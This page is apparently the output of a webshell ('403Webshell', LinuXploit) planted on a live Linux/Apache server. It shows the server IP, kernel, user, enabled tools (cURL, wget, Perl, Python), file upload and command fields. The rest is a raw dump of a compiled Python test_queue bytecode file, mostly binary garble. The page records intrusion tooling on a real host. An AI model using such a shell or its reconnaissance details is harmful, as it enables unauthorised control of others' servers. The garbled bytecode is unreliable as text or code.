403Webshell
Server IP : 118.27.122.248  /  Your IP : 216.73.217.130
Web Server : Apache
System : Linux web0264.sh.tyo1 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
User : c9415830 ( 11735)
PHP Version : 8.4.17
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/alt/python36/lib64/python3.6/test/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/alt/python36/lib64/python3.6/test/__pycache__/test_queue.cpython-36.opt-1.pyc
3

�w2_w3�@s�ddlZddlZddlZddlmZejd�ZdZdd�ZGdd�dej	�Z
Gd	d
�d
�ZGdd�de�ZGd
d�deej
�ZGdd�deej
�ZGdd�deej
�ZGdd�de�ZGdd�dej�ZGdd�deej
�Zedkr�ej�dS)�N)�support�	threading�cCs|jdko|j�|jkS)Nr)�maxsize�qsize)�q�r�4/opt/alt/python36/lib64/python3.6/test/test_queue.py�qfullsr
c@seZdZdd�Zdd�ZdS)�_TriggerThreadcCs&||_||_tj�|_tjj|�dS)N)�fn�argsrZEvent�startedEvent�Thread�__init__)�selfrr
rrr	rs
z_TriggerThread.__init__cCs$tjd�|jj�|j|j�dS)Ng�������?)�timeZsleepr�setrr
)rrrr	�runs	

z_TriggerThread.runN)�__name__�
__module__�__qualname__rrrrrr	rsrc@seZdZdd�Zdd�ZdS)�BlockingTestMixincCsbt||�}|j�z(||�|_|jj�s6|jd|�|jS|jd�|j�r\|jd|�XdS)Nz,blocking function '%r' appeared not to block�
z,trigger function '%r' appeared to not return)r�start�resultr�is_set�fail�join�is_alive)r�
block_func�
block_args�trigger_func�trigger_args�threadrrr	�do_blocking_test1s



z"BlockingTestMixin.do_blocking_testcCs�t||�}|j�z6y||�Wn|k
r6�YnX|jd|�Wd|jd�|j�rj|jd|�|jj�s~|jd�XdS)Nzexpected exception of kind %rrz,trigger function '%r' appeared to not returnz(trigger thread ended but event never set)rrrrrrr)rr r!r"r#Zexpected_exception_classr$rrr	�do_exceptional_blocking_testBs


z.BlockingTestMixin.do_exceptional_blocking_testN)rrrr%r&rrrr	r/src@s\eZdZdd�Zdd�Zdd�Zdd�Zd	d
�Zdd�Zd
d�Z	dd�Z
dd�Zdd�ZdS)�BaseQueueTestMixincCsd|_tj�|_dS)Nr)�cumrZLock�cumlock)rrrr	�setUpXszBaseQueueTestMixin.setUpc%Cs||j�rtd��|j|j��|j|j��|jd�|jd�|jd�tdddgdddgdddgd�}|j�|j�|j�g}|j	|||j
jd�x.tt
d�D]}|j|�|j|j�d�q�W|jt|�d	�d
t
}dt
}|j|�|jt|�d�|j|j��|j|j��y|j|d
d�|jd�Wntjk
�rRYnXy|j|dd�|jd�Wntjk
�r�YnX|j|j|f|jf�|j|j|ddf|jf�xtt
�D]}|j��q�W|j|j�d�y|jd
d�|jd�Wntjk
�rYnXy|jdd�|jd�Wntjk
�rNYnX|j|jf|jd�|j|jd|jd�dS)Nz&Call this function with an empty queue�oiM��)�Queue�	LifoQueue�
PriorityQueuez&Didn't seem to queue the correct data!�zQueue should not be emptyzQueue should not be full��zQueue should be fullr)�blockz(Didn't appear to block with a full queueg{�G�z�?)�timeoutz+Didn't appear to time-out with a full queueTrzQueue should be emptyz*Didn't appear to block with an empty queuez-Didn't appear to time-out with an empty queue�empty�)r5)Tr)r5)r�RuntimeError�
assertTruer5ZassertFalse�full�put�dict�get�assertEqual�	__class__r�range�
QUEUE_SIZEr
r�queue�Fullr%�Empty)rrZtarget_orderZactual_order�i�lastr9rrr	�simple_queue_test\sd





z$BaseQueueTestMixin.simple_queue_testc
CsNxH|j�}|dkr|j�dS|j�|j|7_WdQRX|j�qWdS)Nr)r<�	task_doner)r()rr�xrrr	�worker�szBaseQueueTestMixin.workercCs�d|_g}x0dD](}tj|j|fd�}|j�|j|�qWxtd�D]}|j|�qFW|j�|j	|jt
td��d�xdD]}|jd�q~W|j�x|D]}|j�q�WdS)	Nrr0)�targetr
�dz0q.join() did not block until all tasks were done)rr0)rr0���)r(rrrIr�appendr?r:rr=�sum)rrZthreadsrDr$rrr	�queue_join_test�s 


z"BaseQueueTestMixin.queue_join_testcCs8|j�}y|j�Wntk
r(YnX|jd�dS)Nz(Did not detect task count going negative)�	type2testrG�
ValueErrorr)rrrrr	�test_queue_task_done�sz'BaseQueueTestMixin.test_queue_task_donecCsL|j�}|j|�|j|�y|j�Wntk
r<YnX|jd�dS)Nz(Did not detect task count going negative)rPrOrGrQr)rrrrr	�test_queue_join�s

z"BaseQueueTestMixin.test_queue_joincCs"|jt�}|j|�|j|�dS)N)rPr@rF)rrrrr	�test_simple_queue�s

z$BaseQueueTestMixin.test_simple_queuecCsV|jt�}|jt��|jddd�WdQRX|jt��|jddd�WdQRXdS)Nr0)r4rLrL)rPr@�assertRaisesrQr:r<)rrrrr	�&test_negative_timeout_raises_exception�s

z9BaseQueueTestMixin.test_negative_timeout_raises_exceptioncCs�|jt�}xtt�D]}|jd�qW|jtj��|jd�WdQRXxtt�D]}|j�qRW|jtj��|j�WdQRXdS)Nr0)	rPr@r?�
put_nowaitrUrArBZ
get_nowaitrC)rrrDrrr	�test_nowait�s
zBaseQueueTestMixin.test_nowaitcCs�|jd�}|jd�|jd�|jd�|jtj��|jd�WdQRX|j|j�d�d|_|jtj��|jd�WdQRXdS)Nr2r0r1�)	rPr:rUrArBrWr=rr)rrrrr	�test_shrinking_queue�s



z'BaseQueueTestMixin.test_shrinking_queueN)
rrrr*rFrIrOrRrSrTrVrXrZrrrr	r'Ws9


r'c@seZdZejZdS)�	QueueTestN)rrrrAr-rPrrrr	r[�sr[c@seZdZejZdS)�
LifoQueueTestN)rrrrAr.rPrrrr	r\�sr\c@seZdZejZdS)�PriorityQueueTestN)rrrrAr/rPrrrr	r]�sr]c@seZdZdS)�FailingQueueExceptionN)rrrrrrr	r^�sr^c@s$eZdZdd�Zdd�Zdd�ZdS)�FailingQueuecGs"d|_d|_tjj|f|��dS)NF)�
fail_next_put�
fail_next_getrAr-r)rr
rrr	r�szFailingQueue.__init__cCs"|jrd|_td��tjj||�S)NFzYou Lose)r`r^rAr-�_put)r�itemrrr	rbszFailingQueue._putcCs |jrd|_td��tjj|�S)NFzYou Lose)rar^rAr-�_get)rrrr	rdszFailingQueue._getN)rrrrrbrdrrrr	r_�sr_c@seZdZdd�Zdd�ZdS)�FailingQueueTestc<Cs�|j�rtd��xttd�D]}|j|�qWd|_y|jddd�|jd�Wntk
rfYnXd|_y|jddd	�|jd�Wntk
r�YnX|jd
�|jt	|�d�d|_y"|j
|jd|jf�|jd�Wntk
r�YnX|jd
�d|_y$|j|jd|jft�|jd�Wntk
�rBYnX|jd
�|jt	|�d�|j�|jt	|�d�|jd
�|jt	|�d�|j
|jd|jf�xtt�D]}|j��q�W|j|j�d�|jd�d|_
y|j�|jd�Wntk
�rYnX|j|j�d�d|_
y|jdd	�|jd�Wntk
�rXYnX|j|j�d�|j�|j|j�d�d|_
y$|j|jf|jdt�|jd�Wntk
�r�YnX|j|j�d�|j�|j|j�d�dS)Nz&Call this function with an empty queuer0TZoopsr)r3z)The queue didn't fail when it should haveg�������?)r4rEzQueue should be fullr9rzQueue should not be fullzQueue should be empty�firstzQueue should not be emptyr5)r9)r9Tr)r9)r5)rr7r?r@r:r`rr^r8r
r%r<r&ra)rrrDrrr	�failing_queue_tests�




z#FailingQueueTest.failing_queue_testcCs tt�}|j|�|j|�dS)N)r_r@rg)rrrrr	�test_failing_queueas
z#FailingQueueTest.test_failing_queueN)rrrrgrhrrrr	resQre�__main__)rArZunittestZtestr�
import_modulerr@r
rrrr'ZTestCaser[r\r]�	Exceptionr^r-r_rer�mainrrrr	�<module>s$
 ([

Youez - 2016 - github.com/yon3zu
LinuXploit